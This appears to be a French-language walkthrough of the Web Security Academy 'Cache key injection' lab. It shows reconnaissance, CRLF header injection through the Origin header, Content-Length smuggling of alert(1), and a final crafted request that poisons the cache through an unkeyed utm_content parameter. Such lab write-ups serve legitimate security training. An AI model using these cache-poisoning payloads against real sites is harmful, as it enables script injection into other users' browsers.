Injection dans la clé de cache

Cache key injection

Lab: Cache key injection | Web Security AcademyWebSecAcademy

Injection dans la clé de cache

Nous devons combiner plusieurs failles (dont cache key injection) pour faire exécuter alert(1) dans le navigateur de la victime. Le lab impose l’usage de l’en-tête Pragma: x-get-cache-key.

Reconnaissance

1) Comportement du login

Nous avons un panneau de connexion.
Après login, nous sommes redirigés vers /login/?lang=en.
Une cookie de session est ensuite définie.

2) Réflexion du paramètre lang

Notre entrée apparaît dans la réponse via lang :
- Exemple : /login/?lang=HELLLOOOO

/login/?lang=HELLLOOOO

Si nous mettons des balises HTML (ex: <h1>), ça ne s’exécute pas : il y a de l’HTML encoding.

Point d’entrée exploitable

Fichier JS cacheable : localize.js

/js/localize.js?lang=en&cors=0

Nous remarquons un script en arrière-plan :

/js/localize.js?lang=en&cors=0
Réponse observée :
- document.cookie = 'lang=en';

Si nous changeons lang, la valeur est reflétée :

/js/localize.js?lang=hello&cors=0 → le hello apparaît dans la réponse.

Observation de la clé de cache

Nous ajoutons :

Pragma: x-get-cache-key

Et nous récupérons la clé :

X-Cache-Key: /js/localize.js?lang=en&cors=0$$

Nous constatons que cors influence la clé, et qu’en jouant sur Origin + cors, nous pouvons faire varier ce qui entre dans la cache.

Injection d’en-têtes via retour chariot

Nous utilisons l’injection CRLF :

%0d%0a

man ascii

Nous envoyons :

Origin: hello%0d%0aSet-Cookie:%20csrfKey=a

Résultat : la cookie est bien interprétée côté réponse.

Injection de JavaScript en manipulant `Content-Length`

Nous tentons ensuite d’injecter du contenu dans la réponse avec :

Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

Dans la réponse, nous retrouvons alert(1).

Construire la réponse cacheable ciblée

Pour que le serveur stocke cette version (avec alert(1)), la cache key doit correspondre à une forme qui inclut notre Origin injecté, par exemple :

X-Cache-Key: /js/localize.js?lang=hello&cors=1$$origin=hello%0d%0aContent-Length: 8%0d%0a%0d%0aalert(1)

Déclenchement côté victime via un paramètre ignoré

Nous cherchons un paramètre ignoré par la cache (trouvé avec Param Miner) :

utm_content

Nous réutilisons la cache key et nous plaçons le payload dans utm_content afin de faire servir la ressource empoisonnée tout en visitant lang=en.

Requête finale (telle que nous l’avons utilisée) :

GET /login?lang=en?utm_content=x%26cors=1%26x=1$$origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/2

Quand la victime ouvre la page en /login/?lang=en (via la redirection), le contenu empoisonné est servi depuis la cache, et alert(1) s’exécute.

Mis à jour il y a 2 mois

hashtagCache key injection

hashtagInjection dans la clé de cache

hashtagReconnaissance

hashtagPoint d’entrée exploitable

hashtagObservation de la clé de cache

hashtagInjection d’en-têtes via retour chariot

hashtag1) Test : injection de cookie

hashtagInjection de JavaScript en manipulant Content-Length

hashtagConstruire la réponse cacheable ciblée

hashtagDéclenchement côté victime via un paramètre ignoré

Cache key injection

Injection dans la clé de cache

Reconnaissance

Point d’entrée exploitable

Observation de la clé de cache

Injection d’en-têtes via retour chariot

1) Test : injection de cookie

Injection de JavaScript en manipulant `Content-Length`

Construire la réponse cacheable ciblée

Déclenchement côté victime via un paramètre ignoré